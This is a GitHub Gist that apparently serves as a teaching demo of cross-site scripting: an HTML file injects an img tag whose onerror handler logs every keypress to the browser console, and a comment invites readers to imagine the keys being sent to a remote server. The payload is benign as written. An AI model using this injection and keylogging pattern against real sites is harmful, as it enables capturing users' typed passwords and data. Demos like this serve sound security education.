Created
March 23, 2022 17:33
-
-
Save kieranbarker/b95b591f24f5eefb3ba205e9e6e857bf to your computer and use it in GitHub Desktop.
A simple demo of a cross-site scripting (XSS) attack.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8" /> | |
<meta http-equiv="X-UA-Compatible" content="IE=edge" /> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0" /> | |
<title>XSS</title> | |
</head> | |
<body></body> | |
<script> | |
document.body.innerHTML = ` | |
<img | |
src="x" | |
onerror="document.addEventListener('keydown', event => console.log(event.key))" | |
/> | |
`; | |
</script> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Open this HTML file in your browser and have a look at the JavaScript console. Every time you press a key, it will be logged to the console! Now imagine if, instead of just logging it to the console, the attacker sent everything you typed to a remote server...